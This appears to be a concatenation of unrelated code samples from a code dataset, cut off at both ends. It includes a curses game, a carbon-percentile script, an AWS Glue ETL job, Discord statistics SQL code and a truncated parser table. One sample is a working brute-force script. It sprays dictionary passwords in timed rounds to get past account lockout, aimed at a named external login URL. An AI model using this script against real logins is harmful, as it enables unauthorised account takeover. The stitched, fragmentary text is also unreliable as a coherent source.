choice = stdscr.getch()
if choice == 99: #choice is c
return 1
elif choice == 115: #choice is s
return 0
elif choice == 101: #choice is e
return -1
return 1
def menu(name):
stdscr.clear()
stdscr.border(0)
stdscr.timeout(-1)
stdscr.addstr(3, 5, name + ", what do you want to do?")
stdscr.addstr(5, 10, "Play new game - Press 1")
stdscr.addstr(7, 10, "Exit - Press 4")
stdscr.refresh()
choice = stdscr.getch()
stdscr.clear()
stdscr.border(0)
if choice == 49: #choice is 1
return 1
elif choice == 52: #choice is 4
return 0
return 1
play = menu("HOPPY")
c = 1
x = 25
y = 12
player = 0
while play:
if TESTING:
stdscr.clear()
stdscr.border(0)
stdscr.addstr(y, x, str(c))
stdscr.timeout(100)
button = stdscr.getch()
if button != -1:
if button == curses.KEY_RIGHT and player == 0:
x += 1
if x >= WIDTH - 1:
x -= 1
elif button == curses.KEY_LEFT and player == 0:
x -= 1
if x <= 0:
x += 1
elif button == curses.KEY_UP and player == 1:
y -= 1
if y <= 0:
y += 1
elif button == curses.KEY_DOWN and player == 1:
y += 1
if y >= HEIGHT - 1:
y -= 1
if button == 112: #button is p
cont = pause()
if cont == -1:
c = 1
player = 0
play = menu("HOPPY")
elif cont == 0:
player = (player + 1) % 2
if TESTING:
c += 1
stdscr.keypad(0)
curses.echo()
curses.endwin()
#curse.wrapper([funciton]) sets up and exits curses for you, function is the
#code the runs in curses
#initialize curses
#curses.noecho() #don't echo keys
#curses.cbreak() or curses.raw() #react instantly to keys, raw doesn't ignore
#CTRL-Z(suspend) and CTRL-C(exit)
#stdscr.keypad(1) #read navigation key sequences for me
#deinitialize curses
#curses.nocbreak(); stdscr.keypad(0); curses.echo()
#exit curses
#curses.endwin()
|
7,977 | a801ca6ae90556d41fd278032af4e58a63709cec | # -*- coding: utf-8 -*-
import sys
import getopt
import datetime
import gettext
import math
import datetime
import json
import gettext
from datetime import datetime
FIELD_INDEX_DATE = 0
FIELD_INDEX_DATA = 1
def getPercentile(arr, percentile):
percentile = min(100, max(0, percentile))
index = (percentile / 100) * (len(arr) - 1)
fractionPart = index - math.floor(index)
intPart = math.floor(index)
percentile = float(arr[intPart])
if fractionPart > 0:
percentile += fractionPart * \
(float(arr[intPart + 1]) - float(arr[intPart]))
else:
percentile += 0
return percentile
def write(output_filename, content):
with open(output_filename, 'w') as outfile:
outfile.write(content)
def main(argv):
"""
WebPerf Core Carbon Percentiles
Usage:
* run webperf-core test on all websites you want to use for your percentiles (with json as output file)
* run this file against your output file, for example like this: carbon-rating.py -i data\carbon-references-2022.json -o tests\energy_efficiency_carbon_percentiles.py
Options and arguments:
-h/--help\t\t\t: Help information on how to use script
-i/--input <file path>\t: input file path (.json)
-o/--output <file path>\t: output file path (.py)
"""
output_filename = ''
input_filename = ''
langCode = 'en'
language = False
# add support for default (en) language
language = gettext.translation(
'webperf-core', localedir='locales', languages=[langCode])
language.install()
_ = language.gettext
try:
opts, args = getopt.getopt(
argv, "hi:o:", ["help", "input=", "output="])
except getopt.GetoptError:
print(main.__doc__)
sys.exit(2)
if (opts.__len__() == 0):
print(main.__doc__)
sys.exit(2)
for opt, arg in opts:
if opt in ('-h', '--help'): # help
print(main.__doc__)
sys.exit(2)
elif opt in ("-i", "--input"): # input file path
input_filename = arg
file_ending = ""
file_long_ending = ""
if (len(input_filename) > 4):
file_ending = input_filename[-4:].lower()
if (len(input_filename) > 7):
file_long_ending = input_filename[-7:].lower()
if file_long_ending == ".sqlite":
from engines.sqlite import read_sites, add_site, delete_site
elif (file_ending == ".csv"):
from engines.csv import read_sites, add_site, delete_site
elif (file_ending == ".xml"): # https://example.com/sitemap.xml
from engines.sitemap import read_sites, add_site, delete_site
else:
from engines.json import read_tests, read_sites, add_site, delete_site
pass
elif opt in ("-o", "--output"): # output file path
output_filename = arg
pass
tests = read_tests(input_filename, 0, -1)
generated_date = False
co2s = list()
for test in tests:
if not generated_date:
generated_date = datetime.fromisoformat(
test[FIELD_INDEX_DATE]).strftime('%Y-%m-%d')
str_data = test[FIELD_INDEX_DATA].replace('\'', '"')
data = json.loads(str_data)
print(str_data)
co2s.append(data['co2'])
if not generated_date:
generated_date = datetime.today().strftime('%Y-%m-%d')
output_content = "# This array was last generated with carbon-rating.py on {0}\n".format(
generated_date)
output_content += "def get_generated_date():\n"
output_content += "\treturn '{0}'\n".format(
generated_date)
output_content += "\n"
output_content += "def get_percentiles():\n"
output_content += "\treturn [\n"
co2s_sorted = sorted(co2s)
intervals = list()
index = 1
while (index <= 100):
percentile = getPercentile(co2s_sorted, index)
intervals.append(percentile)
position = index - 1
if index < 100:
if position % 10 == 0 and position != 0:
output_content += "\t\t# {0} percentile\n".format(position)
output_content += "\t\t{0},\n".format(percentile)
else:
output_content += "\t\t{0}\n".format(percentile)
index += 1
output_content += "\t]"
print(output_content)
if (len(output_filename) > 0):
write(output_filename, output_content)
"""
If file is executed on itself then call a definition, mostly for testing purposes
"""
if __name__ == '__main__':
main(sys.argv[1:])
|
7,978 | a2e00af84f743e949b53840ae6d5509e08935486 | from mcpi.minecraft import Minecraft
import random,time
while True:
x,y,z = mc.player.getTilePos()
color = random.randrange(0,9)
mc.setBlock(x,y,z-1,38,color)
time.sleep(0.01)
|
7,979 | 94286fc36e06598b9faa65d9e5759f9518e436c6 | import argparse
import requests
from ba_bypass_bruteforce import bruteforce, stop_brute, success_queue, dict_queue, success_username
from random import choice
from time import sleep
MAX_ROUND = 3 # 爆破的轮数
curr_round = 0 # 当前的轮数
sleep_time = 2 # 每一轮休眠的秒数
def login_limit_user():
"""
登录函数
"""
try:
login_info = dict_queue.get(block=False)
except Exception as e:
print("[Error] {0}".format(repr(e)))
return
username = login_info[0]
# 如果这个用户名已经被爆破出来密码,那么跳过这个用户名
if username in success_username:
return
password = login_info[1]
# 登录
payload = {
"username": username,
"password": password,
}
print('开始尝试用户名:{},密码:{}'.format(username,password))
# url = "http://127.0.0.1:8000/user/login-block-account/?referer=/"
url = "http://ss.gentlecp.com:40000/user/login-block-account/?referer=/"
r = requests.post(url, data=payload)
# 判断是否登录成功
if r.status_code == 200:
msg = login_info
success_str = "欢迎访问GentleCP的网站"
if success_str in r.text:
# 登录成功则把登录信息保存到success_queue
success_queue.put(msg)
# 把登录成功的用户名添加到 success_username中,之后可以跳过这个用户名的密码的爆破
success_username.append(username)
print("[INFO] success: ", msg)
# 如果想要爆破出来一个密码就立刻停止爆破,那么此处调用函数stop_brute,反之则注释此处
# stop_brute()
def get_dict(dict_user, dict_pass):
"""
生成字典队列
:return:
"""
with open("dict/{}".format(dict_user)) as f:
username = [line.strip() for line in f.readlines()]
with open('dict/{}'.format(dict_pass)) as f:
passwords = [line.strip() for line in f.readlines()]
count = 0
for u in username:
# 每一轮都换下一个密码
p = passwords[curr_round % len(passwords)]
count += 1
pair = (u, p)
dict_queue.put(pair)
print("字典生成完成,长度 {}".format(count))
def get_parse() -> dict:
parser = argparse.ArgumentParser()
parser.add_argument("--username", "-u", help="用户名字典")
parser.add_argument("--password", "-p", help="密码字典")
dic = vars(parser.parse_args())
return dic
def print_result():
"""
打印爆破的结果
"""
success = []
while not success_queue.empty():
success.append(success_queue.get())
print("\n[INFO] 爆破结果: ", success)
if __name__ == "__main__":
args = get_parse()
dict_username = args.get('dict_username', "username.txt")
dict_password = args.get('dict_password', "password.txt")
for curr_round in range(0, MAX_ROUND):
print("[INFO] 开始第{0}轮爆破".format(curr_round))
get_dict(dict_username, dict_password)
bruteforce(login_limit_user, thread_num=5)
print("[INFO] Sleep.")
sleep(2)
print_result()
|
7,980 | fcccbc8d582b709aa27500ef28d86103e98eee4c | # Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
# SPDX-License-Identifier: MIT-0
#
# This code is sample only. Not for use in production.
#
# Author: Babu Srinivasan
# Contact: babusri@amazon.com, babu.b.srinivasan@gmail.com
#
# Spark Streaming ETL script
# Input:
# 1/ Kinesis Data Stream source (via AWS Glue Table)
# 2/ Time interval (for Amazon Lookout for Metrics)
# Output:
# 1/ Streaming data (selected columns only) organized by time interval
# Processing:
# 1/ Micro-batch streaming data by time interval
# 2/ Select user specified columns (dimensions & measures) and event_timestamp
# 3/ Output data to S3 sink (organized using S3 prefixes that contains timestamp)
import sys
from awsglue.transforms import *
from awsglue.utils import getResolvedOptions
from pyspark.context import SparkContext
from awsglue.context import GlueContext
from awsglue.job import Job
from awsglue import DynamicFrame
import datetime
args = getResolvedOptions(sys.argv, [
"JOB_NAME",
"srcDBName",
"srcTableName",
"srcFormat",
"l4mBucket",
"l4mBucketPrefix",
"l4mInterval"])
sc = SparkContext()
glueContext = GlueContext(sc)
spark = glueContext.spark_session
job = Job(glueContext)
job.init(args['JOB_NAME'], args)
# Glue Job parameters - specified in cdk.json during stack deployment
bucketname = args["l4mBucket"]
bucketprefix = args["l4mBucketPrefix"]
glue_dbname = args["srcDBName"]
glue_tablename = args["srcTableName"]
src_format = args["srcFormat"]
l4m_interval = int(args["l4mInterval"]) # in minutes
s3path_data = "s3://" + bucketname + "/" + bucketprefix + "/data/"
s3path_chkpt = "s3://" + bucketname + "/" + bucketprefix + "/checkpoint/"
DELTA_MINS = datetime.timedelta(minutes=l4m_interval)
TEMP_TS = datetime.datetime.strptime("1970-01-01 00:00:00", "%Y-%m-%d %H:%M:%S")
BATCH_WIN_SIZE = str(l4m_interval) + " minutes"
# Function to populate time interval based on Event Timestamp.
# This is equivalent to built-in STEP() function in Kinesis Data Analytics SQL application
def populateTimeInterval(rec):
out_ts = (((rec['event_time'] - TEMP_TS) // DELTA_MINS) * DELTA_MINS) + TEMP_TS
rec['intvl_date'] = datetime.datetime.strftime(out_ts, "%Y-%m-%d")
rec['intvl_hhmm'] = datetime.datetime.strftime(out_ts, "%H%M")
return rec
# Main processing logic - called from main for each micro-batch of window size determined by time interval
def processBatch(data_frame, batchId):
if (data_frame.count() > 0):
# Convert Data frame to Glue Dynamic Frame and select only dimensions & measures that will be used by Anomaly detection
datasource0 = DynamicFrame.fromDF(data_frame, glueContext, "from_data_frame").select_fields(['marketplace','event_time', 'views'])
# Populate time interval (yyyy-mm-dd & HHMM)
datasource1 = Map.apply(frame=datasource0, f=populateTimeInterval)
# datasource1.printSchema()
# Write the dynamic frame to S3 sink with prefix constructed from time interval
path_datasink1 = s3path_data
datasink1 = glueContext.write_dynamic_frame.from_options(frame = datasource1, connection_type = "s3", \
connection_options = {"path": path_datasink1, "partitionKeys": ["intvl_date", "intvl_hhmm"]}, \
format_options={"quoteChar": -1, "timestamp.formats": "yyyy-MM-dd HH:mm:ss"}, \
format = src_format, transformation_ctx = "datasink1")
#### Main
data_frame_datasource0 = glueContext.create_data_frame.from_catalog(stream_batch_time = BATCH_WIN_SIZE, \
database = glue_dbname, table_name = glue_tablename, transformation_ctx = "datasource0", \
additional_options = {"startingPosition": "TRIM_HORIZON", "inferSchema": "false"})
data_frame_datasource0.printSchema()
glueContext.forEachBatch(frame = data_frame_datasource0, batch_function = processBatch, \
options = {"windowSize": BATCH_WIN_SIZE, "checkpointLocation": s3path_chkpt})
job.commit() |
7,981 | ce7b7980d1e93f23e7e3ef048ddadc0c779ef9ce | import os
import telebot
bot = telebot.TeleBot(os.environ.get('TELEGRAM_ACCESS_TOCKEN',
'TOKEN'))
|
7,982 | 19ff064f8c27b9796eb435c7d2b9ebf87ee90ad6 | from time import strftime
from Stats.SQL.Compteur import compteurSQL
from Stats.SQL.Rapports import rapportsSQL
from Stats.SQL.Daily import dailySQL
from Stats.SQL.CompteurP4 import compteurJeuxSQL
from Stats.SQL.Historique import histoSQL, histoSQLJeux
from Stats.SQL.ConnectSQL import connectSQL
tableauMois={"01":"janvier","02":"février","03":"mars","04":"avril","05":"mai","06":"juin","07":"juillet","08":"aout","09":"septembre","10":"octobre","11":"novembre","12":"décembre","TO":"TOTAL"}
def exeClassic(count,id,nom,curseurGuild,guild):
dateID=int(strftime("%y")+strftime("%m")+strftime("%d"))
connexionGL,curseurGL=connectSQL(guild.id,nom,"Stats","GL","")
connexion,curseur=connectSQL(guild.id,nom,"Stats",strftime("%m"),strftime("%y"))
compteurSQL(curseur,tableauMois[strftime("%m")]+strftime("%y"),id,(0,id,strftime("%m"),strftime("%y"),count,0),count,(strftime("%d"),strftime("%m"),strftime("%y")),(strftime("%m"),strftime("%y")),"persoM",False,True,1,curseurGL)
connexion.commit()
connexion,curseur=connectSQL(guild.id,nom,"Stats","TO",strftime("%y"))
compteurSQL(curseur,"to"+strftime("%y"),id,(0,id,"TO",strftime("%y"),count,0),count,(strftime("%d"),strftime("%m"),strftime("%y")),("TO",strftime("%y")),"persoA",False,True,1,curseurGL)
connexion.commit()
liste=compteurSQL(curseurGL,"glob",id,(0,id,"TO","GL",count,0),count,(strftime("%d"),strftime("%m"),strftime("%y")),("TO","GL"),"persoA",False,True,1,curseurGL)
if nom in ("Messages","Voice"):
compteurSQL(curseurGL,"dayRank",int(strftime("%y")+strftime("%m")+strftime("%d")),(0,int(strftime("%y")+strftime("%m")+strftime("%d")),strftime("%d"),strftime("%m"),strftime("%y"),count),count,None,None,None,None,False,3,curseurGL)
if nom in ("Emotes","Reactions"):
countGL=curseurGL.execute("SELECT Count FROM glob WHERE ID={0}".format(id)).fetchone()["Count"]
for i in liste:
if i["Rank"]>400:
curseurGL.execute("DROP TABLE IF EXISTS persoM{0}".format(i["ID"]))
curseurGL.execute("DROP TABLE IF EXISTS persoA{0}".format(i["ID"]))
connexionGL.commit()
dailySQL(dateID,(strftime("%d"),strftime("%m"),strftime("%y")),nom,curseurGuild,guild.id,"Stats")
if nom not in ("Mentions","Mentionne"):
rapportsSQL(guild,"ranks",id,None,count,(0,id,strftime("%d"),strftime("%m"),strftime("%y"),dateID,count,nom),strftime("%d"),strftime("%m"),strftime("%y"),nom)
def exeObj(count,idObj,id,obj,guild,nom):
dateID=int(strftime("%y")+strftime("%m")+strftime("%d"))
connexionGL,curseurGL=connectSQL(guild.id,nom,"Stats","GL","")
connexion,curseur=connectSQL(guild.id,nom,"Stats",strftime("%m"),strftime("%y"))
compteurSQL(curseur,tableauMois[strftime("%m")]+strftime("%y")+str(idObj),id,(0,id,idObj,strftime("%m"),strftime("%y"),count),count,(strftime("%d"),strftime("%m"),strftime("%y")),(strftime("%m"),strftime("%y")),"persoM",obj,False,2,curseurGL)
if nom in ("Emotes","Reactions") and curseur.execute("SELECT Count FROM {0}{1} WHERE ID={2}".format(tableauMois[strftime("%m")],strftime("%y"),idObj)).fetchone()["Count"]<10:
curseur.execute("DROP TABLE {0}{1}{2}".format(tableauMois[strftime("%m")],strftime("%y"),idObj))
connexion.commit()
connexion,curseur=connectSQL(guild.id,nom,"Stats","TO",strftime("%y"))
compteurSQL(curseur,"to"+strftime("%y")+str(idObj),id,(0,id,idObj,"TO",strftime("%y"),count),count,(strftime("%d"),strftime("%m"),strftime("%y")),("TO",strftime("%y")),"persoA",obj,False,2,curseurGL)
if nom in ("Emotes","Reactions") and curseur.execute("SELECT Count FROM to{0} WHERE ID={1}".format(strftime("%y"),idObj)).fetchone()["Count"]<25:
curseur.execute("DROP TABLE to{0}{1}".format(strftime("%y"),idObj))
connexion.commit()
liste=compteurSQL(curseurGL,"glob"+str(idObj),id,(0,id,idObj,"TO","GL",count),count,(strftime("%d"),strftime("%m"),strftime("%y")),("TO","GL"),"persoA",obj,False,2,curseurGL)
if nom in ("Emotes","Reactions"):
if curseurGL.execute("SELECT Count FROM glob WHERE ID={0}".format(idObj)).fetchone()["Count"]<50:
curseurGL.execute("DROP TABLE glob{0}".format(idObj))
if curseurGL.execute("SELECT Rank FROM glob WHERE ID={0}".format(idObj)).fetchone()["Rank"]>400:
for i in liste:
curseurGL.execute("DROP TABLE IF EXISTS persoM{0}{1}".format(i["ID"],idObj))
curseurGL.execute("DROP TABLE IF EXISTS persoA{0}{1}".format(i["ID"],idObj))
connexionGL.commit()
if nom not in ("Mentions","Mentionne"):
rapportsSQL(guild,"objs",idObj,id,count,(0,id,idObj,strftime("%d"),strftime("%m"),strftime("%y"),dateID,count,nom),strftime("%d"),strftime("%m"),strftime("%y"),nom)
def exeJeuxSQL(id,idObj,state,guild,curseurGuild,count,option,tours):
dictCount={"W":2,"L":-1}
dictW={"W":1,"L":0}
dictL={"W":0,"L":1}
connexionGL,curseurGL=connectSQL(guild,option,"Jeux","GL","")
connexion,curseur=connectSQL(guild,option,"Jeux",strftime("%m"),strftime("%y"))
compteurJeuxSQL(curseur,tableauMois[strftime("%m")]+strftime("%y"),id,(0,id,strftime("%m"),strftime("%y"),dictW[state],dictL[state],dictCount[state],0),dictCount[state],(strftime("%d"),strftime("%m"),strftime("%y")),(strftime("%m"),strftime("%y")),"persoM",False,state,4,curseurGL)
if idObj!=None:
compteurJeuxSQL(curseur,tableauMois[strftime("%m")]+strftime("%y")+str(idObj),id,(0,id,idObj,strftime("%m"),strftime("%y"),dictW[state],dictL[state],dictCount[state],0),dictCount[state],(strftime("%d"),strftime("%m"),strftime("%y")),(strftime("%m"),strftime("%y")),"persoM",True,state,5,curseurGL)
connexion.commit()
connexion,curseur=connectSQL(guild,option,"Jeux","TO",strftime("%y"))
compteurJeuxSQL(curseur,"to"+strftime("%y"),id,(0,id,"TO",strftime("%y"),dictW[state],dictL[state],dictCount[state],0),dictCount[state],(strftime("%d"),strftime("%m"),strftime("%y")),("TO",strftime("%y")),"persoA",False,state,4,curseurGL)
if idObj!=None:
compteurJeuxSQL(curseur,"to"+strftime("%y")+str(idObj),id,(0,id,idObj,"TO",strftime("%y"),dictW[state],dictL[state],dictCount[state],0),dictCount[state],(strftime("%d"),strftime("%m"),strftime("%y")),("TO",strftime("%y")),"persoA",True,state,5,curseurGL)
connexion.commit()
compteurJeuxSQL(curseurGL,"glob",id,(0,id,"TO","GL",dictW[state],dictL[state],dictCount[state],0),dictCount[state],(strftime("%d"),strftime("%m"),strftime("%y")),("TO","GL"),"persoA",False,state,4,curseurGL)
if idObj!=None:
compteurJeuxSQL(curseurGL,"glob"+str(idObj),id,(0,id,idObj,"TO","GL",dictW[state],dictL[state],dictCount[state],0),dictCount[state],(strftime("%d"),strftime("%m"),strftime("%y")),("TO","GL"),"persoA",True,state,5,curseurGL)
histoSQLJeux(curseurGL,id,tours,strftime("%d")+"/"+strftime("%m")+"/"+strftime("%y"),idObj,state)
connexionGL.commit()
dailySQL(int(strftime("%y")+strftime("%m")+strftime("%d")),(strftime("%d"),strftime("%m"),strftime("%y")),option,curseurGuild,guild,"Jeux") |
7,983 | 160f272edd8283ea561552f22c71967db4a1660a |
# parsetab.py
# This file is automatically generated. Do not edit.
# pylint: disable=W,C,R
_tabversion = '3.10'
_lr_method = 'LALR'
_lr_signature = 'AND BREAK CHAR COLON COMA CTE_F CTE_I CTE_STRING DETERMINANT DIFFERENT DIVIDE DO DOUBLEEQUAL ELSE EQUAL FLOAT FROM FUNCTION ID IF INPUT INT INVERSA LBRACE LCORCH LOWEREQUAL LOWERTHAN LPAREN MAIN MINUS MOREEQUAL MORETHAN OR PLUS PRINT PROGRAM RBRACE RCORCH RETURN RPAREN SEMICOLON TIMES TO TRANSPUESTA VAR VOID WHILEprogram : PROGRAM ID COLON varsGlobal function main endPrograma\n | PROGRAM ID COLON function main endPrograma\n | PROGRAM ID COLON varsGlobal main endPrograma\n | PROGRAM ID COLON main endPrograma\n endPrograma :varsGlobal : VAR varAuxGlobal1\n varAuxGlobal1 : tipo varAuxGlobal2 SEMICOLON\n | tipo varAuxGlobal2 SEMICOLON varAuxGlobal1\n varAuxGlobal2 : ID\n | ID COMA varAuxGlobal2\n | ID LCORCH CTE_I RCORCH\n | ID LCORCH CTE_I RCORCH COMA varAuxGlobal2\n | ID LCORCH CTE_I RCORCH LCORCH CTE_I RCORCH\n | ID LCORCH CTE_I RCORCH LCORCH CTE_I RCORCH COMA varAuxGlobal2\n main : nomMain LPAREN RPAREN LBRACE bloqueAux RBRACE\n | nomMain LPAREN RPAREN LBRACE vars bloqueAux RBRACE\n | nomMain LPAREN RPAREN LBRACE llamadaAFuncion RBRACE\n nomMain : MAIN\n vars : VAR varAux1\n varAux1 : tipo varAux2 SEMICOLON\n | tipo varAux2 SEMICOLON varAux1\n varAux2 : ID push_var\n | ID push_var COMA varAux2\n | ID LCORCH CTE_I RCORCH push_arreglo\n | ID LCORCH CTE_I RCORCH push_arreglo COMA varAux2\n | ID LCORCH CTE_I RCORCH LCORCH CTE_I RCORCH push_matriz\n | ID LCORCH CTE_I RCORCH LCORCH CTE_I RCORCH push_matriz COMA varAux2\n push_var :push_arreglo :push_matriz :tipo : INT\n | FLOAT\n | CHAR\n tipoFunc : INT\n | FLOAT\n | CHAR\n | VOID\n bloque : LBRACE RBRACE\n | LBRACE bloqueAux RBRACE\n function : FUNCTION tipoFunc nomFunc LPAREN RPAREN LBRACE functionReturn RBRACE endProc\n | FUNCTION tipoFunc nomFunc LPAREN RPAREN LBRACE vars bloqueAux functionReturn RBRACE endProc\n | FUNCTION tipoFunc nomFunc LPAREN RPAREN LBRACE functionReturn RBRACE endProc function \n | FUNCTION tipoFunc nomFunc LPAREN RPAREN LBRACE vars bloqueAux functionReturn RBRACE endProc function\n | FUNCTION tipoFunc nomFunc LPAREN RPAREN LBRACE bloqueAux functionReturn RBRACE endProc\n | FUNCTION tipoFunc nomFunc LPAREN RPAREN LBRACE bloqueAux functionReturn RBRACE endProc function\n | FUNCTION tipoFunc nomFunc LPAREN param RPAREN LBRACE functionReturn RBRACE endProc \n | FUNCTION tipoFunc nomFunc LPAREN param RPAREN LBRACE bloqueAux functionReturn RBRACE endProc\n | FUNCTION tipoFunc nomFunc LPAREN param RPAREN LBRACE bloqueAux functionReturn RBRACE endProc function\n | FUNCTION tipoFunc nomFunc LPAREN param RPAREN LBRACE vars bloqueAux functionReturn RBRACE endProc\n | FUNCTION tipoFunc nomFunc LPAREN param RPAREN LBRACE functionReturn RBRACE endProc function\n | FUNCTION tipoFunc nomFunc LPAREN param RPAREN LBRACE vars bloqueAux functionReturn RBRACE endProc function\n functionReturn : RETURN exp creaCuadReturn SEMICOLON\n | empty\n creaCuadReturn :\n endProc :\n param : tipo ID paramAvarTable\n | tipo ID paramAvarTable COMA param\n | empty\n paramAvarTable : empty : \n push_function :nomFunc : ID push_function\n bloqueAux : estatuto\n | estatuto bloqueAux\n while : WHILE while1 LPAREN expresion RPAREN while2 LBRACE bloqueAux RBRACE while3\n while1 :while2 :while3 :loopFromDo : FROM LPAREN ID EQUAL expresion RPAREN TO LPAREN expresion RPAREN DO LBRACE bloqueAux RBRACE\n estatuto : asignacion\n | condicion\n | escritura\n | while\n | loopFromDo\n | comparacion\n | llamadaAFuncion SEMICOLON\n | lectura\n | BREAK generaCuadbreak SEMICOLON\n | transpuesta\n | inversa\n transpuesta : ID push_id TRANSPUESTA creaTrans SEMICOLON\n inversa : ID push_id INVERSA creaInversa SEMICOLON\n creaInversa : creaTrans : generaCuadbreak : llamadaAFuncion : ID actualizaFuncion generarEra LPAREN paramFuncion gosub RPAREN expresion\n | ID actualizaFuncion generarEra LPAREN paramFuncion gosub RPAREN\n actualizaFuncion : gosub :\n generarEra :\n paramFuncion : ID push_id2 paramFuncionAux\n | ID push_id2 paramFuncionAux COMA paramFuncion\n | exp paramFuncionAux\n | exp paramFuncionAux COMA paramFuncion\n | empty\n paramFuncionAux : push_id2 :arreglo : ID push_id LCORCH exp RCORCH ver_dim1\n matrix : ID push_id LCORCH exp RCORCH LCORCH exp RCORCH ver_dim2\n ver_dim2 : asignacion : ID push_id EQUAL push_poper expresion create_asign SEMICOLON\n | arreglo EQUAL push_poper exp create_asign SEMICOLON\n | matrix EQUAL push_poper exp create_asign SEMICOLON\n | ID push_id EQUAL push_poper llamadaAFuncion create_asign SEMICOLON\n | ID push_id EQUAL push_poper determinante SEMICOLON\n determinante : ID push_id DETERMINANT\n push_id_dimensionada :create_asign_dim :ver_dim1 :create_asign :comparacion : ID push_id DOUBLEEQUAL push_poper expresion SEMICOLON\n condicion : IF LPAREN expresion RPAREN cond bloque condFinal\n | IF LPAREN expresion RPAREN cond bloque ELSE condElse bloque condFinal\n cond :condElse :condFinal :escritura : PRINT push_poper LPAREN escrituraAux RPAREN quad_print SEMICOLON\n | PRINT push_poper LPAREN llamadaAFuncion RPAREN quad_print SEMICOLON\n lectura : INPUT push_poper LPAREN ID push_id RPAREN quad_print SEMICOLON\n quad_print :escrituraAux : expresion\n | CTE_STRING push_cte\n | expresion COMA escrituraAux\n | CTE_STRING push_cte COMA escrituraAux\n | llamadaAFuncion\n expresion : exp\n | exp comp exp quad_comp\n comp : LOWERTHAN push_poper\n | MORETHAN push_poper\n | DIFFERENT push_poper\n | DOUBLEEQUAL push_poper\n | LOWEREQUAL push_poper\n | MOREEQUAL push_poper\n quad_comp :exp : termino quad_term\n | termino quad_term exp1\n exp1 : PLUS push_poper exp\n | MINUS push_poper exp\n quad_term :quad_fact :termino : factor quad_fact\n | factor quad_fact termino1\n termino1 : TIMES push_poper termino\n | DIVIDE push_poper termino\n factor : LPAREN expresion RPAREN\n | factorAux\n factorAux : PLUS push_poper var_cte\n | MINUS push_poper var_cte\n | var_cte \n push_id :push_cte :push_poper :var_cte : ID push_id\n | CTE_I push_cte\n | CTE_F push_cte\n | CTE_STRING push_cte\n | arreglo\n | matrix\n '
_lr_action_items = {'MOREEQUAL':([106,107,108,110,112,113,114,115,117,119,120,144,146,150,153,154,155,156,158,190,195,198,199,201,203,218,219,257,258,276,277,278,279,305,315,],[-149,-157,-139,-158,-140,-151,-151,-151,-150,160,-146,-151,-150,-135,-141,-155,-156,-154,-153,-156,-136,-148,-147,-142,-145,-109,-150,-98,-153,-137,-138,-144,-143,-100,-99,]),'CTE_STRING':([78,80,82,95,103,104,105,109,111,116,124,126,127,131,151,152,160,161,162,163,164,165,166,171,174,176,177,191,196,197,200,202,205,206,207,208,210,211,239,245,246,247,248,256,291,293,307,309,],[-152,-152,114,114,114,144,114,-152,-152,114,-152,114,-152,114,114,114,-152,-152,-152,-152,114,-152,-152,114,114,114,114,144,-152,-152,-152,-152,-133,-130,-131,-128,-132,-129,144,114,114,114,114,114,114,114,114,114,]),'LCORCH':([34,57,75,86,94,117,122,146,158,218,219,226,252,258,],[40,-150,-150,126,133,-150,168,-150,126,256,-150,-150,284,126,]),'RETURN':([50,52,53,54,58,61,62,66,67,68,72,81,89,99,100,132,136,141,185,217,223,238,244,250,255,261,274,275,280,282,289,290,300,304,312,318,319,322,328,],[-63,-77,-79,-71,-74,-70,-80,-73,-75,-72,95,-64,-76,95,95,-78,95,95,95,-82,-81,-102,-103,-116,-111,-105,-117,-118,-38,-112,-101,-104,-39,-119,-116,-68,-113,-65,-69,]),'DO':([321,],[324,]),'VOID':([5,],[13,]),'EQUAL':([47,49,57,75,86,130,218,257,305,315,],[78,80,-150,-150,127,177,-109,-98,-100,-99,]),'CHAR':([5,10,35,39,55,142,167,],[15,25,25,25,25,25,25,]),'VAR':([4,37,72,100,],[10,55,55,55,]),'WHILE':([37,46,50,52,53,54,58,61,62,66,67,68,72,84,89,96,100,132,139,167,212,217,223,238,244,249,250,255,261,274,275,280,282,289,290,295,300,304,312,318,319,322,326,328,],[63,63,63,-77,-79,-71,-74,-70,-80,-73,-75,-72,63,-19,-76,63,63,-78,63,-20,-21,-82,-81,-102,-103,63,-116,-111,-105,-117,-118,-38,-112,-101,-104,63,-39,-119,-116,-68,-113,-65,63,-69,]),'PROGRAM':([0,],[2,]),'PRINT':([37,46,50,52,53,54,58,61,62,66,67,68,72,84,89,96,100,132,139,167,212,217,223,238,244,249,250,255,261,274,275,280,282,289,290,295,300,304,312,318,319,322,326,328,],[48,48,48,-77,-79,-71,-74,-70,-80,-73,-75,-72,48,-19,-76,48,48,-78,48,-20,-21,-82,-81,-102,-103,48,-116,-111,-105,-117,-118,-38,-112,-101,-104,48,-39,-119,-116,-68,-113,-65,48,-69,]),'MORETHAN':([106,107,108,110,112,113,114,115,117,119,120,144,146,150,153,154,155,156,158,190,195,198,199,201,203,218,219,257,258,276,277,278,279,305,315,],[-149,-157,-139,-158,-140,-151,-151,-151,-150,166,-146,-151,-150,-135,-141,-155,-156,-154,-153,-156,-136,-148,-147,-142,-145,-109,-150,-98,-153,-137,-138,-144,-143,-100,-99,]),'MINUS':([78,80,82,95,103,104,105,106,107,108,110,112,113,114,115,116,117,120,124,126,127,131,144,146,150,153,154,155,156,158,160,161,162,163,164,165,166,171,174,176,177,190,191,196,197,198,199,200,201,202,203,205,206,207,208,210,211,218,219,226,239,245,246,247,248,256,257,258,278,279,291,293,305,307,309,315,],[-152,-152,109,109,109,109,109,-149,-157,-139,-158,-140,-151,-151,-151,109,-150,-146,-152,109,-152,109,-151,-150,197,-141,-155,-156,-154,-153,-152,-152,-152,-152,109,-152,-152,109,109,109,109,-156,109,-152,-152,-148,-147,-152,-142,-152,-145,-133,-130,-131,-128,-132,-129,-109,-150,-150,109,109,109,109,109,109,-98,-153,-144,-143,109,109,-100,109,109,-99,]),'DIVIDE':([106,107,110,112,113,114,115,117,120,144,146,153,154,155,156,158,190,198,199,203,218,219,226,257,258,305,315,],[-149,-157,-158,-140,-151,-151,-151,-150,-146,-151,-150,200,-155,-156,-154,-153,-156,-148,-147,-145,-109,-150,-150,-98,-153,-100,-99,]),'RCORCH':([70,106,107,108,110,112,113,114,115,117,120,150,153,154,155,156,158,173,179,195,198,199,201,203,213,218,257,276,277,278,279,287,302,305,315,],[94,-149,-157,-139,-158,-140,-151,-151,-151,-150,-146,-135,-141,-155,-156,-154,-153,218,230,-136,-148,-147,-142,-145,252,-109,-98,-137,-138,-144,-143,305,313,-100,-99,]),'DETERMINANT':([219,258,],[-150,288,]),'RPAREN':([17,35,43,44,74,101,106,107,108,110,112,113,114,115,